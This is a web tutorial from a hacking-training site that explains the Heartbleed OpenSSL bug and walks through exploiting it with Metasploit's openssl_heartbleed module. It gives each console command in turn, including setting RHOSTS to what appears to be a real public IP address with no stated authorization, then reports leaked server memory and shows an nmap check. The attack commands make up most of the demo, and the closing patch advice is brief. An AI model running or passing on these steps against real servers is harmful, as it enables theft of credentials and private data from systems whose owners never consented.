How to Exploit Heartbleed using Metasploit in Kali Linux

Heartbleed vulnerability (registered as CVE-2014-0160) is a security bug present in the older version of OpenSSL cryptographic library. OpenSSL is a cryptographic toolkit used to implement the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. Heartbleed bug in OpenSSL discovered in 2012 while in 2014 it was publicly disclosed.This article discusses the steps to exploit heartbleed vulnerability.

There were around half a million of web servers claimed to be secure and trusted by a certified authority, were believed to be compromised because of this vulnerability. This bug allowed attackers to access sensitive information present on web servers even though servers using TLS secure communication link, because the vulnerability was not in TLS but in its OpenSSL implementation.

How it works?

Heartbleed vulnerability

To understand how Heartbleed vulnerability works, first we need to understand how SSL/TLS works. While communicating over SSL/TLS protocol there is a term that is called ‘Heartbeat’, a request message consists of a payload along with the length of the payload i.e. a 16-bit integer. Heartbeat request message let the two communicating computers know about their connection that they are still connected even if the user is not uploading or downloading anything at that time.

Now let’s say a client sends a Heartbeat request to the server saying send me the four letter word ‘bird’. This message in encrypted form received by the server and then server acknowledges the request by sending back the exact same encrypted piece of data i.e. ‘bird’. This Heartbeat message request includes information about its own length. Now in the malicious usage scenario the client sends the request by saying send me the word ‘bird’ consisting of 500 letters. This let the server to store more in memory buffer based on the reported length of the requested message and sends him back more information present on the web server. The attacker can perform this attack many times to extract the useful information including login credentials.

Heartbleed Exploit Demo

In this demo I will demonstrate a simple exploit of how an attacker can compromise the server by using Kali Linux.

Step01: Install Metasploit to use latest auxiliary module for Heartbleed

#apt install metasploit-framework

Install Metasploit to use latest auxiliary module for Heartbleed

Be patient as it will take some time, I have already installed the framework here, after installation is completed you will be back to the Kali prompt.

Step02: Start the Metasploit console

#msfconsole

Start the Metasploit console

Step03: Search Heartbleed module by using built in search feature in Metasploit framework, select the first auxiliary module which I highlighted

#search heartbleed

earch Heartbleed module by using built in search feature in Metasploit framework, select the first auxiliary module which I highlighted

Step04: Load the heartbleed by module by the command

#use auxiliary/scanner/ssl/openssl_heartbleed

load the heartbleed by module by the command

Step05: After loading the auxiliary module, extract the info page to reveal the options to set the target

#info

After loading the auxiliary module, extract the info page to reveal the options to set the target

Step06: we need to set the parameter RHOSTS to a target website which needs to be attacked

#set RHOSTS 86.104.176.22

we need to set the parameter RHOSTS to a target website which needs to be attacked

Step07: To get the verbose output and see what will happen when I attack the target, enable verbose

#set VERBOSE true

To get the verbose output and see what will happen when I attack the target, enable verbose

Step08: Finally attack the target by typing command:

#exploit

Finally attack the target by typing command

Finally attack the target by typing command1

The target system has successfully leaked some random information. In this way attacker can perform this procedure again and again to extract the useful information because he has no control over its location and cannot choose the desired content, every time you repeat this process different data can be extracted.

There are many tools that will show if the website is still vulnerable to Heartbleed attack. In our case we have checked the vulnerability by using Nmap tool

Simply type #nmap –p 443 –script ssl-heartbleed [Target’s IP]

target system is using old version It shows that the target system is using old version of OpenSSL and had vulnerability to be exploited.

Heartbleed is still present in many of web servers which are not upgraded to the patched version of OpenSSL. The way to fix this vulnerability is to upgrade the latest version of OpenSSL. The affected versions of OpenSSL are from 1.0.1 to 1.0.1f. Try to avoid using these versions.

Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Blind SQL Injection Tutorial to Hack a Website

In the previous article, we have the basics of SQL Injection; what SQLi is and what are the types of SQL injection. And, In...

What is SQL Injection? Tutorial: Type and Example

What is SQL injection, and what are the types of SQL injection? These are the common questions, and we will seek the answer to...

Are Cisco 300-410 Exam and Its Related Certification Your Pathway to Career Success? Find Out about This

Introduction Career success can mean different things to different people. For some, it could mean having a prestigious title and for others, it could be...

How to Hack Windows 10 Password Using FakeLogonScreen in Kali Linux

This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic and...